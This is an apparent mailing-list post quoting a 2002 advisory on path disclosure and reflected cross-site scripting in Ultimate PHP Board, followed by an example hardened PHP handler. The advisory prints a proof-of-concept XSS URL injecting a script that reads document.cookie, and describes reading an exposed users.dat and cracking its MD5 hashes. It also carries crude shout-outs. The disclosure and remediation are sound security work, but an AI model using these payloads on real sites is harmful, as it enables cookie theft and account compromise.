Anything about UPB was already written (1.1 & 1.0beta):
http://www.frogsecure.com/tutos/UPB.txt
>From: "euronymous" <just-a-user (at) yandex (dot) ru>
>Reply-To: just-a-user (at) yandex (dot) ru
>To: bugtraq (at) securityfocus (dot) com, vulnwatch (at) vulnwatch (dot) org
>Subject: XSS and Path Disclosure in UPB
>Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)
>
>=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
>topic: XSS and Path Disclosure in UPB
>product: Ultimate PHP Board (UPB) final beta 1.0
>vendor: http://www.webrc.ca/php/upb.php
>risk: middle
>date: 12/7/2k2
>discovered by: euronymous /F0KP /HACKRU Team
>advisory url: http://f0kp.iplus.ru/bz/009.txt
>=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
>
>description
>-----------
>
>1) when calling add.php, which comes with upb, it outputs an
>error message that contains the following information:
>
>================================================================
>Warning: Failed opening 'textdb_v2.inc.php' for inclusion
>(include_path='.:/usr/local/lib/php') in
>/home/samcom/public_html/public/messageboard2/add.php on line 5
>attempting to edit record...
>
>Fatal error: Call to undefined function: format_field() in
>/home/samcom/public_html/public/messageboard2/add.php on line 11
>================================================================
>
>as you can see, script output contains full physical path of the
>board.
>
>2). but if user has deleted this file (add.php) u can view
>the full path in this way:
>
>==============================================================
>http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
>==============================================================
>
>cos the `id' parameter doesn't check if input data has entered
>correctly, then it outputs the following error message:
>
>===================--======= snip =============================
>Warning: Unable to access ./data_dir/some_shit.dat in
>/home/samcom/public_html/public/messageboard2/textdb.inc.php on
>line 240
>
>..
>
>Warning: Supplied argument is not a valid File-Handle resource
>in /home/samcom/public_html/public/messageboard2/textdb.inc.php
>on line 241
>
>..
>=========================== snip ==============================
>
>where `data_dir' is the name of the directory where important
>files are stored, eg users.dat with users passwords (md5). the
>default name of this directory is `db'.
>
>if user doesn't make this dir secure, then you can get the users
>passwds with reading file users.dat (default name.. but it is an
>old stuff) and cracking the .md5 hashes.
>
>3) cos the above, file viewtopic.php doesn't check at all, then you
>can insert some html in scripts output:
>
>========================================================
>http://hostname.com/phorum/viewtopic.php?id=
>%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
>========================================================
>
>[it must be in a single string]
>
>not URL-encoded string working fine also.
>ps. all of these issues apply to previous versions upb.
>
>shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
>russian security guyz!! and kate for she is kewl girl ))
>fuck_off: slavomira and other dirty ppl in *.kz
>
>================
>im not a lame,
>not yet a hacker
>================
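The issues in points 2 and 3 of the quoted advisory share one root cause: the `id` parameter reaches a file open and the HTML output unchecked, while PHP warnings are displayed to the client. The following is an added example, not code from UPB or from either poster, of a hardened request handler for a viewtopic.php-style script. It assumes PHP 7.1 or later; `DATA_DIR`, `clean_id()`, `load_topic()` and the one-record-per-line `.dat` layout are hypothetical.

```php
<?php
// Added example: hypothetical hardened handler for a viewtopic.php-style script.
// DATA_DIR, clean_id(), load_topic() and the .dat layout are assumptions, not UPB code.

// Keep PHP warnings (which carry absolute paths) out of the response; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

const DATA_DIR = __DIR__ . '/db';   // assumed location; better kept outside the web root

/** Return the id as an integer, or null unless the input is a short run of digits. */
function clean_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;                 // rejects markup, path separators, arrays, empty input
    }
    return (int) $raw;
}

/** Read a topic file only after the id is validated and the file is known to exist. */
function load_topic(int $id): ?array
{
    $path = DATA_DIR . '/' . $id . '.dat';
    if (!is_file($path) || !is_readable($path)) {
        return null;                 // no failed open, so no warning and no path in output
    }
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    return $lines === false ? null : $lines;
}

$id    = clean_id($_GET['id'] ?? null);
$t_id  = clean_id($_GET['t_id'] ?? null);
$topic = ($id !== null && $t_id !== null) ? load_topic($id) : null;

if ($topic === null) {
    http_response_code(404);
    echo 'Topic not found.';         // generic message: input is never echoed back
    exit;
}

header('Content-Type: text/html; charset=utf-8');
foreach ($topic as $line) {
    // Encode everything read from storage before it reaches the HTML output.
    echo '<p>', htmlspecialchars($line, ENT_QUOTES, 'UTF-8'), "</p>\n";
}
```

The users.dat exposure described in point 2 is a separate control: place the data directory outside the document root or deny HTTP access to it at the web server.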